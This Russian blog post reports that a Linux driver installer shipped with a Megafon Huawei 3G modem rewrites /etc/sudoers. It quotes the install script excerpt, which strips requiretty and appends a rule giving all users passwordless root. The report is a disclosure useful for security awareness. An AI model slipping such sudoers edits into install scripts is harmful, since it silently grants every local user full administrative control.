При установке драйверов для Megafon 3G modem на операционной системе linux происходит модификация файла sudoers.
В блоге habrahabr.ru Антон Лисицин сообщил об инциденте связанном с драйверами для 3G модема «Huawei» от Megafon. Согласно его сообщению, при установке, идущего в комплекте с устройством, программного обеспечения происходит модификация файла sudoers. В следствии изменения этого файла повышаются привилегии всех пользователей на системе.
В блоге habrahabr.ru Антон Лисицин сообщил об инциденте связанном с драйверами для 3G модема «Huawei» от Megafon. Согласно его сообщению, при установке, идущего в комплекте с устройством, программного обеспечения происходит модификация файла sudoers. В следствии изменения этого файла повышаются привилегии всех пользователей на системе.
 |
| Драйверы для 3G modem |
«Купил модем E173, на встроенной памяти скрипт установки, требует права рута. Совершил ошибку, дал молча права. Позже вижу, что команда sudo не требует пароля», - сообщил автор.
Независимый исследователь проанализировал скрипт установки и обнаружил ту его часть, которая стала причиной модификации:
grep -v «MobilePartner.sh» /etc/sudoers >/tmp/${TEMPFILE} 2>&1
DELETECOMMENT=«delete requiretty for hw_mobile»
REQUIRETTY=`grep "${DELETECOMMENT}" /tmp/${TEMPFILE}`
if [ «x${REQUIRETTY}» != «x» ]
then
REQUIRETTY=`echo "${REQUIRETTY}" | awk -F ',' '{printf $2}'`
else
REQUIRETTY=`grep «requiretty» /tmp/${TEMPFILE}`
if [ «x${REQUIRETTY}» != «x» ]
then
sed -i «s/${REQUIRETTY}/# ,${REQUIRETTY},${DELETECOMMENT}/g» /tmp/${TEMPFILE} 2>/dev/null
fi
fi# Shashank: Defect fix AJ2D13470: Begin
echo -e «ALL ALL=(ALL) NOPASSWD:ALL» >> /tmp/${TEMPFILE}
В настоящий момент неизвестно содержит ли данное программное обеспечение какой-либо вредоносный код.
Комментариев нет:
Отправить комментарий